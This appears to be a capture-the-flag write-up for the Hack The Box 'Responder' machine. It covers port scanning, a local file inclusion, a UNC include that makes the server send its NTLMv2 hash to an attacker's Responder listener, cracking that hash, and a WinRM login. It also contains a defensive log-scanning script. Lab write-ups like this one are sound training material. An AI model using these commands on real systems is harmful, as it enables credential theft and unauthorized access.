Port recognition with nmap, or you can use recon:

┌──(root@ghost)-[/home/ghost]
└─# recon responder.htb

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
B.O.T.N.E.T. created by Binlaab

[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 13:25 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Initiating Ping Scan at 13:25
Scanning responder.htb (10.129.55.46) [4 ports]
Completed Ping Scan at 13:25, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:25
Scanning responder.htb (10.129.55.46) [65535 ports]
Discovered open port 7680/tcp on 10.129.55.46
Completed SYN Stealth Scan at 13:26, 26.74s elapsed (65535 total ports)
NSE: Script scanning 10.129.55.46.
Initiating NSE at 13:26
Completed NSE at 13:26, 0.00s elapsed
Nmap scan report for responder.htb (10.129.55.46)
Host is up (0.076s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
7680/tcp open  pando-pub

NSE: Script Post-scanning.
Initiating NSE at 13:26
Completed NSE at 13:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.07 seconds
           Raw packets sent: 131076 (5.767MB) | Rcvd: 5 (204B)

recon reports one open TCP port, 7680 (pando-pub).

┌──(root@ghost)-[/home/ghost]
└─# curl http://responder.htb
<meta http-equiv="refresh" content="0;url=http://unika.htb/">

We obtain a new domain name, so add it to /etc/hosts. Time to recon the new domain:

┌──(root@ghost)-[/home/ghost]
└─# recon unika.htb

[R3C0N] by 0bfxgh0st 4 WWA with ❤
Cyberapocalypse 2022 whoohoo !

[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 13:34 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Initiating Ping Scan at 13:34
Scanning unika.htb (10.129.55.46) [4 ports]
Completed Ping Scan at 13:34, 0.11s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:34
Scanning unika.htb (10.129.55.46) [65535 ports]
Discovered open port 80/tcp on 10.129.55.46
Discovered open port 5985/tcp on 10.129.55.46
Completed SYN Stealth Scan at 13:34, 26.36s elapsed (65535 total ports)
NSE: Script scanning 10.129.55.46.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Nmap scan report for unika.htb (10.129.55.46)
Host is up (0.065s latency).
rDNS record for 10.129.55.46: responder.htb
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman

NSE: Script Post-scanning.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.64 seconds
           Raw packets sent: 131091 (5.768MB) | Rcvd: 22 (952B)


[+] [fuzzin server]
http://unika.htb [200 OK] Apache[2.4.52], Bootstrap, Country[RESERVED][ZZ], Email[info@unika.htb], HTML5, HTTPServer[Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1], IP[10.129.55.46], JQuery[1.11.1], OpenSSL[1.1.1m], PHP[8.1.1], Script, Title[Unika], X-Powered-By[PHP/8.1.1], X-UA-Compatible[IE=edge]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jul 21 13:34:43 2022
URL_BASE: http://unika.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://unika.htb:80/ ----
+ http://unika.htb:80/aux (CODE:403|SIZE:298)
+ http://unika.htb:80/cgi-bin/ (CODE:403|SIZE:298)
+ http://unika.htb:80/com1 (CODE:403|SIZE:298)
+ http://unika.htb:80/com2 (CODE:403|SIZE:298)
+ http://unika.htb:80/com3 (CODE:403|SIZE:298)
+ http://unika.htb:80/con (CODE:403|SIZE:298)
==> DIRECTORY: http://unika.htb:80/css/
+ http://unika.htb:80/examples (CODE:503|SIZE:398)
==> DIRECTORY: http://unika.htb:80/img/
==> DIRECTORY: http://unika.htb:80/inc/
+ http://unika.htb:80/index.php (CODE:200|SIZE:46453)
==> DIRECTORY: http://unika.htb:80/js/
+ http://unika.htb:80/licenses (CODE:403|SIZE:417)
+ http://unika.htb:80/lpt1 (CODE:403|SIZE:298)
+ http://unika.htb:80/lpt2 (CODE:403|SIZE:298)
+ http://unika.htb:80/nul (CODE:403|SIZE:298)
+ http://unika.htb:80/phpmyadmin (CODE:403|SIZE:417)
+ http://unika.htb:80/prn (CODE:403|SIZE:298)
+ http://unika.htb:80/server-info (CODE:403|SIZE:417)
+ http://unika.htb:80/server-status (CODE:403|SIZE:417)
+ http://unika.htb:80/webalizer (CODE:403|SIZE:417)

-----------------
END_TIME: Thu Jul 21 13:44:11 2022
DOWNLOADED: 4612 - FOUND: 17

We obtain a lot of information. The open ports are 80 (web service) and 5985 (wsman, i.e. WinRM). New web directories were found too. After browsing the unika.htb website we found a possible Local File Inclusion at http://unika.htb/index.php?page=french.html, so let's test it with a known local path:

┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=C:/windows/system32/drivers/etc/hosts"
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

We have LFI. With a little more work we can try RFI as well, so let's start the Responder listener:

┌──(root@ghost)-[/home/ghost]
└─# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.145]
    Responder IPv6             [dead:beef:2::108f]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-W34A17CNUZZ]
    Responder Domain Name      [3QQ2.LOCAL]
    Responder DCE-RPC Port     [49451]

[+] Listening for events...

Now Responder is waiting for events. The idea is to make the web server include a resource on our IP address:

┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=//10.10.14.145/whatever"
<br />
<b>Warning</b>:  include(\\10.10.14.145\WHATEVER): Failed to open stream: Permission denied in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>:  include(): Failed opening '//10.10.14.145/whatever' for inclusion (include_path='\xampp\php\PEAR') in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />

Back to the responder listener

┌──(root@ghost)-[/home/ghost]
└─# responder -I tun0

...

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : ::ffff:10.129.55.46
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:c3fb49ee7a1d349e...

After we curl our own IP address through the RFI, Responder captures the NTLMv2 hash, which we save to a file and crack:
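Seen from the server side, the absolute-path include and the UNC include above leave the same trace: a ?page= value that is not one of the site's own pages. As an added example that is not part of the original writeup, this Python script runs an allowlist check over constructed Apache access-log lines modelled on this box's requests; the allowed page names are an assumption, not taken from the box.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed allowlist of legitimate ?page= values for this site (not taken from the box).
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}

# Apache combined-log prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_page_value(value: str) -> str:
    """Classify one ?page= value: ok, unc, absolute, remote, traversal or unknown."""
    v = unquote(value).replace("\\", "/")      # extra decode catches %252F; normalise slashes
    if v in ALLOWED_PAGES:
        return "ok"
    if v.startswith("//"):                      # //host/share: PHP on Windows opens it as a UNC
        return "unc"                            # path and the server authenticates outbound
    if re.match(r"^[A-Za-z]:/", v):             # C:/... absolute local path (classic LFI)
        return "absolute"
    if re.match(r"^[a-z][a-z0-9+.-]*://", v):   # http://... (RFI if allow_url_include is on)
        return "remote"
    if ".." in v.split("/"):                    # directory traversal relative to the web root
        return "traversal"
    return "unknown"


def scan_access_log(lines):
    """Yield (client_ip, raw_page_value, verdict) for every non-allowlisted ?page= value."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query)
        for value in query.get("page", []):
            verdict = classify_page_value(value)
            if verdict != "ok":
                yield m["ip"], value, verdict


# Constructed sample log lines modelled on the requests shown in this writeup.
SAMPLE_LOG = [
    '10.10.14.145 - - [21/Jul/2022:13:40:01 -0400] "GET /index.php?page=french.html HTTP/1.1" 200 46453',
    '10.10.14.145 - - [21/Jul/2022:13:41:10 -0400] "GET /index.php?page=C:/windows/system32/drivers/etc/hosts HTTP/1.1" 200 824',
    '10.10.14.145 - - [21/Jul/2022:13:55:32 -0400] "GET /index.php?page=//10.10.14.145/whatever HTTP/1.1" 200 512',
    '10.10.14.145 - - [21/Jul/2022:14:10:05 -0400] "GET /index.php?page=..%2F..%2F..%2Fwindows%2Fsystem32%2Fdrivers%2Fetc%2Fhosts HTTP/1.1" 200 824',
    '10.10.14.145 - - [21/Jul/2022:14:11:00 -0400] "GET /index.php?page=C:\\Users\\mike\\Desktop\\flag.txt HTTP/1.1" 200 33',
]

if __name__ == "__main__":
    for ip, value, verdict in scan_access_log(SAMPLE_LOG):
        print(f"{verdict:9s} {ip} page={value}")
```

A "unc" hit paired with an outbound SMB connection from the web server to the same client IP is the signature of the hash capture shown above.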

┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton        (Administrator)     
1g 0:00:00:00 DONE (2022-07-21 14:08) 33.33g/s 113066p/s 113066c/s 113066C/s hellboy..stargirl
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

We cracked the hash and obtained valid credentials to connect to the wsman (WinRM) service:

┌──(root@ghost)-[/home/ghost]
└─# evil-winrm -i 10.129.174.83 -u administrator -p 'badminton'

PS C:\Users\Administrator\Documents> cd C:\Users\mike\Desktop
PS C:\Users\mike\Desktop> type flag.txt
ea81b7afddd03efaa0945333ed147fac

The flag is at C:\Users\mike\Desktop\flag.txt. Knowing that path, it can also be read directly through the LFI:

┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=C:\Users\mike\Desktop\flag.txt"
ea81b7afddd03efaa0945333ed147fac

As you can see, it is possible to obtain the flag through the LFI alone once the path is known.